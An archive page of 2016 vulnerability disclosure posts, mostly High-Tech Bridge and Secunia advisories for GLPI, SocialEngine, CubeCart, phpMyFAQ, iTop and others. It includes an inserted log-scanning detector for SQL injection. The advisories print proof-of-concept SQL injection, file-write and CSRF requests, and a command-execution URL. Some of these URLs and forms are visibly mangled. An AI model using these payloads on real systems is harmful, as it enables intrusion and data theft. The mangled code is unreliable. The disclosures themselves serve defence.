suggestion response, not allowing sufficient time for the large
response to be transferred over the network.
- Due to the very large response size needed to trigger this issue, it
is only exploitable over broadband or local networks such as a rogue
WiFi hotspot.

Vendor Responses

Google response re: Android AOSP browser:
"The team reviewed this issue and don’t believe there is a security
vulnerability here. It seems the worse things that can happen is the
browser crashes due to resource exhaustion. The phone is still usable
so there isn’t a denial of service."

Google response re: Chromium:
"We don’t consider DoS to be a security vulnerability. See the Chrome
Security FAQ: 
https://www.chromium.org/Home/chromium-security/security-faq#TOC-Are-denial-of-service-issues-considered-security-bugs-"

Mozilla / FireFox response has been to remove the security restriction
on this bug, therefore indicating that this is not a security issue.

References

Android bug reports: 214784 and 214785
Chromium bug reports: 624779 and 624794
FireFox bug reports: 1283675 and 1283672

Timeline

2016-06-30: Bug filed with Android
2016-06-30: Bug filed with Chromium
2016-06-30: Bug filed Mozilla/FireFox
2016-06-30: Response from Chromium, Won’t Fix
2016-07-12: Response from Android, not a security issue
2016-07-13: Android team is ok with disclosure
2016-07-14: Mozilla removes security restrictions on the bug
2016-07-26: Public disclosure


Secunia Research: Reprise License Manager "akey" Buffer Overflow Vulnerability

2016-07-25 Thread Secunia Research
==

Secunia Research 25/07/2016

Reprise License Manager "akey" Buffer Overflow Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerabilities
4) Solution
5) Time Table
6) Credits
7) References
8) About Secunia
9) Verification

==
1) Affected Software

* Reprise License Manager versions 12.0BL2, 12.1BL2, and 12.1BL3.
  Other versions may also be affected.

==
2) Severity

Rating: Moderately critical
Impact: System compromise
Where:  From local network

==
3) Description of Vulnerabilities

Secunia Research has discovered a vulnerability in Reprise License
Manager (RLM), which can be exploited by malicious people to compromise
a vulnerable system.

The vulnerability is caused due to a boundary error when handling the
"akey" POST parameter related to /goform/activate_doit, which can be
exploited to cause a stack-based buffer overflow via a specially
crafted HTTP request.

Successful exploitation of the vulnerability may allow execution of
arbitrary code.

==
4) Solution

No official solution is currently available.

==
5) Time Table

01/06/2016 - Initial contact with vendor.
01/06/2016 - Vendor responds with service ticket ID.
02/06/2016 - Details transferred.
02/06/2016 - Vendor confirms reception and informs that the issues
 will be fixed in version 12.1.
28/06/2016 - Release of vendor patch.
30/06/2016 - Release of Secunia Advisory SA67000, which includes
 one of the vulnerabilities that is confirmed fixed.
01/07/2016 - Contacted the vendor that vulnerability #2 is still
 unpatched, and requested an ETA for a fixed release.
01/07/2016 - Vendor disagrees on the existence of the vulnerability
 because the application is by design never run with
 elevated privileges.
01/07/2016 - Replied to the vendor with detailed analysis of the 
 issue and clarified that as the vulnerability is
 remotely exploitable, it is still exploitable even if
 the application is run without elevated privileges.
03/07/2016 - Vendor requests a screenshot.
12/07/2016 - Provided the vendor with a video file.
12/07/2016 - Vendor replies that the issue is fixed for the next
 release. The vendor notes that the issue is not
 considered a security issue, because RLM should never be
 run as a privileged user.
13/07/2016 - Clarified to the vendor that the issue is indeed seen
 as a security issue and elaborated further on the
 reasons. Requested fix date and set release of
 the Secunia Advisory SA71200 to 22nd July 2016.
19/07/2016 - The vendor informs us that the issue will be fixed in
 the time frame between now and until the end of the
 year.
22/07/2016 - Release of Secunia Advisory SA71200.
25/07/2016 - Public disclosure of Research Advisory.

==
6) Credits

Discovered by Behzad Najjarpour Jabbari, Secunia Research at Flexera
Software.

==
7) References

Currently no CVE identifier is assigned.

==
8) About Secunia (now part of Flexera Software)

In September 2015, Secunia was acquired by Flexera Software:

https://secunia.com/blog/435/

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/products/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
secu

Secunia Research: Reprise License Manager "actserver" Buffer Overflow Vulnerability

2016-07-25 Thread Secunia Research
==

Secunia Research 25/07/2016

  Reprise License Manager "actserver" Buffer Overflow Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerabilities
4) Solution
5) Time Table
6) Credits
7) References
8) About Secunia
9) Verification

==
1) Affected Software

* Reprise License Manager version 12.0BL2. Other versions may also be
  affected.

==
2) Severity

Rating: Moderately critical
Impact: System compromise
Where:  From local network

==
3) Description of Vulnerabilities

Secunia Research has discovered a vulnerability in Reprise
License Manager (RLM), which can be exploited by malicious people to
compromise a vulnerable system.

The vulnerability is caused due to a boundary error when handling the
"actserver" POST parameter related to /goform/activate_doit, which
can be exploited to cause a stack-based buffer overflow via a
specially crafted HTTP request.

Successful exploitation of the vulnerability may allow execution of
arbitrary code.

==
4) Solution

Update to version 12.1BL2 if available for the supported platforms.

==
5) Time Table

01/06/2016 - Initial contact with vendor.
01/06/2016 - Vendor responds with service ticket ID.
02/06/2016 - Details transferred.
02/06/2016 - Vendor confirms reception and informs that the issues
 will be fixed in version 12.1.
28/06/2016 - Release of vendor patch.
30/06/2016 - Release of Secunia Advisory SA67000, which includes
 one of the vulnerabilities that is confirmed fixed.
25/07/2016 - Public disclosure of Research Advisory.

==
6) Credits

Discovered by Behzad Najjarpour Jabbari, Secunia Research at Flexera
Software.

==
7) References

Currently no CVE identifier is assigned.

==
8) About Secunia (now part of Flexera Software)

In September 2015, Secunia was acquired by Flexera Software:

https://secunia.com/blog/435/

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/products/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/company/jobs/

==
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2016-7/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


BFS-SA-2016-003: Huawei HiSuite Insecure Service Directory ACLs

2016-06-30 Thread Blue Frost Security Research Lab


Vendor: Huawei, www.huawei.com
Affected Product: HiSuite for Windows
Affected Version: <= 4.0.3.301
CVE ID: CVE-2016-5821
OVE ID: OVE-20160624-0001
Severity: High
Author: Benjamin Gnahm (@mitp0sh), Blue Frost Security GmbH
Title: Huawei HiSuite Insecure Service Directory ACLs


A privilege escalation vulnerability was identified in the Huawei
HiSuite software which can be used by a local user to elevate
privileges to become the SYSTEM user.

The root cause of the problem is insecure ACLs on the HandSet service
directory, which allow any authenticated user to place a crafted DLL
file in that directory to perform a DLL hijacking attack.

Huawei has released software updates to address the issue. The full
advisory with technical details is available at the following link:

https://labs.bluefrostsecurity.de/advisories/bfs-sa-2016-003/



SQL Injection in GLPI

2016-04-29 Thread High-Tech Bridge Security Research
Advisory ID: HTB23301
Product: GLPI
Vendor: INDEPNET 
Vulnerable Version(s): 0.90.2 and probably prior
Tested Version: 0.90.2
Advisory Publication:  April 8, 2016  [without technical details]
Vendor Notification: April 8, 2016 
Vendor Patch: April 11, 2016 
Public Disclosure: April 29, 2016 
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High 
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a high-risk SQL injection 
vulnerability in the popular Information Resource Manager (IRM) system GLPI. IRM 
systems are usually used for the management and audit of software packages, 
providing an ITIL-compliant service desk. The vulnerability allows a remote 
non-authenticated attacker to execute arbitrary SQL queries, read and write 
data to the application's database and completely compromise the vulnerable 
system.

The vulnerability exists due to insufficient filtration of user-supplied data 
passed via the "page_limit" HTTP GET parameter to the 
"/ajax/getDropdownConnect.php" PHP script. A remote unauthenticated attacker 
can alter the present SQL query, and inject and execute arbitrary SQL commands 
in the application's database.

Below is a simple SQL Injection exploit, which uses a time-based exploitation 
technique. The page load time will be significantly higher if the MySQL 
version is 5.X or superior:

http://[host]/ajax/getDropdownConnect.php?fromtype=Computer=Computer=1_limit=1%20PROCEDURE%20analyse%28%28select%20extractvalue%28rand%28%29,concat%280x3a,%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,%20BENCHMARK%28500,SHA1%281%29%29,1%29%29%29%29%29,1%29


---

Solution:

Update to GLPI 0.90.3

More Information:
http://www.glpi-project.org/spip.php?page=annonce_breve=358=en
https://github.com/glpi-project/glpi/issues/581

---

References:

[1] High-Tech Bridge Advisory HTB23301 - 
https://www.htbridge.com/advisory/HTB23301 - SQL Injection in GLPI.
[2] GLPI - http://www.glpi-project.org - GLPI is the Information Resource 
Manager with an additional Administration Interface.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



RCE via CSRF in phpMyFAQ

2016-04-20 Thread High-Tech Bridge Security Research
Advisory ID: HTB23300
Product: phpMyFAQ
Vendor: http://www.phpmyfaq.de 
Vulnerable Version(s): 2.8.26, 2.9.0-RC2 and probably prior
Tested Version: 2.8.26, 2.9.0-RC2
Advisory Publication:  March 30, 2016  [without technical details]
Vendor Notification: March 30, 2016 
Vendor Patch: April 11, 2016 
Public Disclosure: April 20, 2016 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: High 
CVSSv3 Base Score: 8.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a high-risk security 
vulnerability in the popular multilingual FAQ software phpMyFAQ. A remote 
attacker can execute arbitrary PHP code on the vulnerable system via a CSRF 
attack against the website administrator and completely compromise the 
vulnerable web application. 

The vulnerability exists because the application does not properly verify the 
origin of HTTP requests in the "Interface Translation" functionality. A remote 
unauthenticated attacker can create a specially crafted malicious web page with 
a CSRF exploit, trick a logged-in administrator into visiting the page, spoof 
the HTTP request as if it were coming from the legitimate user, and inject and 
execute arbitrary PHP code on the target system with the privileges of the 
webserver. 

A simple CSRF exploit below can be used to inject "phpinfo()" PHP function into 
file "/lang/language_af.php":


 http://[host]/admin/index.php?action=ajax=trans=save_added_trans;
 method="POST" name="main">






document.main.submit();


To trigger the execution of "phpinfo()", just open the following file in your 
browser (no privileges required): 


 http://[host]/; method="POST">







---

Solution:

Update to phpMyFAQ 2.8.27 or 2.9.0-RC3

More Information:
http://www.phpmyfaq.de/security/advisory-2016-04-11

---

References:

[1] High-Tech Bridge Advisory HTB23300 - 
https://www.htbridge.com/advisory/HTB23300 - RCE via CSRF in phpMyFAQ
[2] phpMyFAQ - http://www.phpmyfaq.de - Open Source FAQ software
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Securing Android Applications from Screen Capture

2016-04-14 Thread research
Original here:
https://blog.nightwatchcybersecurity.com/research-securing-android-applications-from-screen-capture-8dce2c8e21d#.bw2qwe213

Research: Securing Android Applications from Screen Capture

Summary (TL;DR)
Apps on Android and some platform services are able to capture other apps' 
screens by using the MediaProjection API. Because of the way this API implements 
“securing” sensitive screens, there exist some possible security issues. The 
best way to secure your Android app is to use FLAG_SECURE on sensitive screens 
and DO NOT use the virtual keyboard (here is why).

MediaProjection API

Since Android 5.0, there exists a new MediaProjection API that allows apps to 
record videos and take screenshots of screens belonging to other apps. The API 
is described as follows:
Android 5.0 lets you add screen capturing and screen sharing capabilities to 
your app with the new android.media.projection APIs. This functionality is 
useful, for example, if you want to enable screen sharing in a video 
conferencing app. The new createVirtualDisplay() method allows your app to 
capture the contents of the main screen (the default display) into a Surface 
object, which your app can then send across the network. The API only allows 
capturing non-secure screen content, and not system audio. To begin screen 
capturing, your app must first request the user’s permission by launching a 
screen capture dialog using an Intent obtained through the 
createScreenCaptureIntent() method.
(On Android versions prior to 5 there are other methods, such as undocumented 
APIs and ADB; we are focusing on Android 5+.)

This API also drives several other functions in the OS:
- Recent apps screenshots
- Pinning
- Casting to other displays
- Google Play Games, video recording feature
- Taking screenshots

All of these functions, as well as the MediaProjection API, can take screenshots 
and videos of other apps. For apps to use the API, special permission is 
required; for platform features, no special permission is needed. Additionally, 
any applications signed by the system key (Google apps) can use this API 
without permission as well.

A good open source example of an application that uses the API can be found 
here:
https://github.com/JakeWharton/Telecine

Secure and non-secure content
As mentioned in the Google docs above, “the API only allows capturing 
non-secure screen content”. What exactly is “secure” and “non-secure” content?

This refers to a special flag which can be applied to views in Android, called 
FLAG_SECURE. It is described in Android docs as follows:
Treat the content of the window as secure, preventing it from appearing in 
screenshots or from being viewed on non-secure displays

Setting this flag on an Android view will prevent screenshots from being taken 
manually, and any other app or platform service will show a black screen. This 
functionality is not global for the entire app, but can be set on specific 
screens which may be more sensitive, and not set on others. There is no other 
way or permission that can mark an entire app, or any part of it, as exempt 
from screen capture or recording.

NOTE: Even on views marked with FLAG_SECURE, the virtual keyboard is ALWAYS 
visible. This is due to a known Android bug which Google has so far refused to 
fix:
https://code.google.com/p/android/issues/detail?id=129285

How screen capture really works in Android

The term “secure” as used in this context does not mean that the content of the 
app cannot be captured, rather that it cannot be “viewed on non-secure 
displays”. This is because screen capture and the concept of secure / 
non-secure isn’t what developers may think it is.

Behind the scenes, this API and related platform services use the concept of 
Casting (similar to AirPlay). Apps that capture screenshots and record videos 
must create a virtual display to which the device content is then cast. The 
FLAG_SECURE flag is also not used for security but rather means copyrighted 
content in the context of DRM and displays—i.e. secure content would 
be something like a DVD, and a secure display would be an HDTV.

This is clear on the device itself—when an app begins to record 
the screen, the cast icon is turned on in the notification bar. This is also 
clear from the Android source code and this doc:
Display flag: Indicates that the display has a secure video output and supports 
compositing secure surfaces. If this flag is set then the display device has a 
secure video output and is capable of showing secure surfaces. It may also be 
capable of showing protected buffers. If this flag is not set then the display 
device may not have a secure video output; the user may see a blank region on 
the screen instead of the contents of secure surfaces or protected buffers.

That would mean that an Android device casting to a DRM-protected display like 
a TV would always display sensitive screens, since the concept of secure really 
means “copyrighted”. For apps

Open redirect on Google.com

2016-04-12 Thread research
Overview
An open redirect is operating at www.google.com

Details
Google’s main website provides a subsite for displaying mobile-optimized pages 
published using a special subset of HTML called AMP. While this works for 
mobile devices, for non-mobile devices, this redirects to the original site, 
thus resulting in an open redirect. 

The subsite operates at the following URL:
https://www.google.com/amp/

where  is the URL of the site. 

Here is an example of a legit URL—in mobile browsers this would 
display the actual article (this can be simulated using Chrome’s developer tools):
https://www.google.com/amp/www.usatoday.com/story/life/people/2016/03/31/world-famous-architect-zaha-hadid-dies-age-65/82466082/

HOWEVER, on non-mobile devices this would redirect to:
http://www.usatoday.com/story/life/people/2016/03/31/world-famous-architect-zaha-hadid-dies-age-65/82466082/

Because the vendor accepts any site without a whitelist, this can be used as an 
open redirect. Additionally, since this is hosted on the same main domain as 
the search engine, it can in theory be used to drive XSS or other similar 
attacks, although this is mitigated by the fact that AMP currently does not 
allow JavaScript.

Vendor Response
The vendor communicated that they do not consider open redirects to be a 
security issue.

References
Google Security CID: 7–262311032
AMP site: https://www.ampproject.org/
Vendor’s view on open redirects: 
https://sites.google.com/site/bughunteruniversity/nonvuln/open-redirect

Timeline
2016-04-07: Vendor notified
2016-04-07: Vendor response
2016-04-11: Public disclosure


SQL Injection in SocialEngine

2016-04-06 Thread High-Tech Bridge Security Research
Advisory ID: HTB23286
Product: SocialEngine
Vendor: Webligo
Vulnerable Version(s): 4.8.9 and probably prior
Tested Version: 4.8.9
Advisory Publication:  December 21, 2015  [without technical details]
Vendor Notification: December 21, 2015 
Public Disclosure: April 6, 2016 
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High 
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability 
in the popular social networking software SocialEngine. The vulnerability can be 
exploited to gain access to potentially sensitive information in the database 
and compromise the entire website.

The vulnerability exists due to insufficient filtration of input data passed 
via the "orderby" HTTP GET parameter to the "/index.php" script. A remote 
unauthenticated attacker can modify the present query and execute arbitrary SQL 
commands in the application's database.

A simple exploit below uses a time-based SQL injection technique to demonstrate 
the existence of the vulnerability. The following HTTP request will make the 
page render for 99 seconds if the MySQL server version is equal to "5":

http://[host]/blogs/?category=0_date==1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29

---

Solution:

Update to SocialEngine 4.8.10

More Information:
http://blog.socialengine.com/2016/01/20/socialengine-php-4-8-10-is-released/

---

References:

[1] High-Tech Bridge Advisory HTB23286 - 
https://www.htbridge.com/advisory/HTB23286 - SQL Injection in SocialEngine
[2] SocialEngine - http://www.socialengine.com/ - SocialEngine is PHP community 
software that helps you build your own custom social network website. Advanced 
social networking features include blogs, photo albums, user groups and forums, 
providing complete control over the layout and functionality of your social 
network, community, forum, or portal.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Multiple Vulnerabilities in CubeCart

2016-03-30 Thread High-Tech Bridge Security Research
Advisory ID: HTB23298
Product: CubeCart
Vendor: CubeCart Limited
Vulnerable Version(s): 6.0.10 and probably prior
Tested Version: 6.0.10
Advisory Publication:  March 2, 2016  [without technical details]
Vendor Notification: March 2, 2016 
Vendor Patch: March 16, 2016 
Public Disclosure: March 30, 2016 
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], 
Cross-Site Request Forgery [CWE-352]
Risk Level: Medium 
CVSSv3 Base Scores: 6.6 [CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H], 6.1 
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N], 4.7 
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in 
the popular open source shopping software CubeCart. The discovered 
vulnerabilities allow a remote attacker to compromise the vulnerable website and 
its databases, and conduct sophisticated attacks against its users. 


1) SQL Injection in CubeCart

The vulnerability exists due to insufficient filtration of user-supplied data 
passed via the "char" HTTP GET parameter to the "/admin.php" PHP script. A remote 
authenticated attacker with privileges to view the list of products can alter 
the present SQL query, and inject and execute arbitrary SQL commands in the 
application's database. This vulnerability can also be exploited by an anonymous 
attacker via a CSRF vector. 

A simple CSRF exploit below will create a PHP file "/var/www/site/file.php" 
(assuming MySQL has write permissions to this directory), which can execute the 
phpinfo() function:
http://[host]/admin.php?_g=products_id=1[updated]=DESC=T]%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,'',1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20INTO%20OUTFILE%20'/var/www/site/file.php'%20--%202">


2) Stored Cross-Site Scripting in CubeCart

The vulnerability exists due to insufficient filtration of user-supplied input 
passed via the "first_name" and "last_name" HTTP POST parameters to the 
"/index.php" script. A remote authenticated attacker can edit his or her profile, 
permanently inject malicious HTML and JavaScript code and execute it in the 
administrator's browser in the context of the vulnerable website, when the 
"Customer List" page is viewed. Exploitation of this vulnerability requires the 
attacker to have valid user credentials; however, registration is open by default.

Successful exploitation of this vulnerability may allow a remote attacker to 
gain complete control over the web application once the logged-in administrator 
just visits "Customer List" page. This vulnerability can also be used to 
perform drive-by-download or spear-phishing attacks against.

To reproduce the vulnerability, log in to the website with privileges of a 
regular user and use the exploit below to modify "First" and "Last name" in 
attacker's profile:

http://[host]/index.php?_a=profile; method="POST" name="f1">











document.f1.submit();

A JS popup with the word "ImmuniWeb" will be displayed when the website 
administrator visits the "Customer List" page:
http://[host]/admin.php?_g=customers


3) Cross-Site Request Forgery in CubeCart

The vulnerability exists due to insufficient validation of the HTTP request 
origin when deleting local files. A remote unauthenticated attacker can create a 
specially crafted malicious web page with a CSRF exploit, trick a logged-in 
administrator into visiting the page, spoof the HTTP request as if it were 
coming from the legitimate user, and delete an arbitrary file on the system. 

A simple exploit below will delete file "/index.php". To reproduce the 
vulnerability, just log in as an administrator and visit the link below:
http://[host]/admin.php?_g=maintenance=index=../index.php



---

Solution:

Update to CubeCart 6.0.11

More Information:
https://forums.cubecart.com/topic/51079-cubecart-6011-released/

---

References:

[1] High-Tech Bridge Advisory HTB23298 - 
https://www.htbridge.com/advisory/HTB23298 - Multiple Vulnerabilities in 
CubeCart
[2] CubeCart - https://www.cubecart.com/ - CubeCart is a free responsive open 
source PHP ecommerce software system.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitorin
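The three SQL injection advisories above (GLPI "page_limit", SocialEngine "orderby" and CubeCart "char") all rely on MySQL delay or file-write primitives that stand out in web-server access logs once the query string is URL-decoded. The detector below is an added example written for this page, not code from High-Tech Bridge or any of the vendors; the log lines it scans are constructed to resemble those requests, and the signature list and log format are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Signatures matched after URL decoding, case-insensitively. They cover the
# primitives used in the proof-of-concept requests above: MySQL delay functions
# (time-based probing), PROCEDURE ANALYSE abuse, and INTO OUTFILE file writes.
SIGNATURES = {
    "time_delay": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    "procedure_analyse": re.compile(r"\bPROCEDURE\s+ANALYSE\s*\(", re.I),
    "file_write": re.compile(r"\bINTO\s+OUTFILE\b", re.I),
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# Common/combined log format (assumed); request line split into method,
# path and protocol version.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def analyse_request(path):
    """Return (script, hits) for one request target.

    hits is a list of (parameter, signature) pairs in the order they were found.
    """
    parts = urlsplit(path)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already decoded once; decode again so a double-encoded
        # payload (%2528 -> %28 -> "(") is not missed.
        decoded = unquote_plus(value)
        for sig_name, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                hits.append((name, sig_name))
    return parts.path, hits


def scan_log(lines):
    """Run analyse_request over access-log lines; one finding per hit line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        script, hits = analyse_request(m.group("path"))
        if hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "script": script, "status": m.group("status"),
                             "hits": hits})
    return findings


# Constructed sample log (not real traffic), modelled on the advisories' requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Apr/2016:10:00:01 +0000] "GET /ajax/getDropdownConnect.php'
    '?fromtype=Computer&page_limit=1%20PROCEDURE%20analyse%28%28select%20BENCHMARK'
    '%28500%2CSHA1%281%29%29%29%2C1%29 HTTP/1.1" 200 512',
    '203.0.113.5 - - [29/Apr/2016:10:00:02 +0000] "GET /ajax/getDropdownConnect.php'
    '?fromtype=Computer&page_limit=10 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [06/Apr/2016:11:30:00 +0000] "GET /blogs/?category=0'
    '&orderby=1%20AND%20%28SELECT%20SLEEP%2899%29%29 HTTP/1.1" 200 3001',
    '198.51.100.7 - - [06/Apr/2016:11:30:05 +0000] "GET /blogs/?category=0'
    '&orderby=creation_date HTTP/1.1" 200 3001',
    '192.0.2.9 - - [30/Mar/2016:09:12:44 +0000] "GET /admin.php?_g=products'
    "&char=T%27%20UNION%20SELECT%201%2C2%20INTO%20OUTFILE%20%27/var/www/site/file.php"
    '%27%20--%202 HTTP/1.1" 302 0',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["script"], f["hits"])
```

The status code is carried along because a 302 or 500 on an admin script with an INTO OUTFILE hit is worth a different triage priority than a 200 on a public page.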

Remote Code Execution via CSRF in iTop

2016-03-19 Thread High-Tech Bridge Security Research
Advisory ID: HTB23293
Product: iTop
Vendor: Combodo
Vulnerable Version(s): 2.2.1 and probably prior
Tested Version: 2.2.1
Advisory Publication:  February 10, 2016  [without technical details]
Vendor Notification: February 10, 2016 
Vendor Patch: February 11, 2016 
Public Disclosure: March 18, 2016 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: High 
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a Remote Code Execution 
vulnerability in iTop that is exploitable via a Cross-Site Request Forgery flaw 
that is also present in the application. The vulnerability exists due to the 
absence of validation of the HTTP request origin in the 
"/env-production/itop-config/config.php" script, as well as a lack of 
sanitization of user input received via the "new_config" HTTP POST parameter. 

A remote unauthenticated attacker can perform a CSRF attack and execute arbitrary 
PHP code on the vulnerable system with the privileges of the web server. Successful 
exploitation of the vulnerability may allow an attacker to execute arbitrary 
system commands on the web server and gain complete access to the vulnerable web 
application and its databases, which may contain very sensitive information. 

The attacker creates a malicious web page with CSRF exploit code, tricks a 
logged-in administrator into visiting the page, spoofs the HTTP request as if it 
were coming from the legitimate user, and permanently injects malicious PHP code 
into the iTop configuration file.

The CSRF exploit will inject the following PHP code into the iTop configuration file:

 

To reproduce the vulnerability, just create an empty HTML file and paste the 
following CSRF exploit code into it:


http://[host]/env-production/itop-config/config.php?c%5Bmenu%5D=ConfigEditor;
 method="post" name="main">







Then log in to the iTop website with an admin account and open the file in your 
browser. 

After successful exploitation an attacker can run arbitrary system commands 
using the "/pages/UI.php" script. This simple PoC will execute "/bin/ls" 
directory listing command: 

http://[host]/pages/UI.php?cmd=ls

---

Solution:

Replace the file datamodels/2.x/itop-config/config.php by the version from the 
appropriate revision from SVN, then run the setup again.

More Information:
https://sourceforge.net/p/itop/tickets/1202/

---

References:

[1] High-Tech Bridge Advisory HTB23293 - 
https://www.htbridge.com/advisory/HTB23293  - RCE via CSRF in iTop
[2] iTop - http://www.combodo.com - iTop: open source ITIL ITSM Software.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Admin Password Reset & RCE via CSRF in Dating Pro

2016-03-19 Thread High-Tech Bridge Security Research
Advisory ID: HTB23294
Product: Dating Pro
Vendor: DatingPro
Vulnerable Version(s): Genie (2015.7) and probably prior
Tested Version: Genie (2015.7)
Advisory Publication:  February 10, 2016  [without technical details]
Vendor Notification: February 10, 2016 
Vendor Patch: February 29, 2016 
Public Disclosure: March 18, 2016 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: Critical 
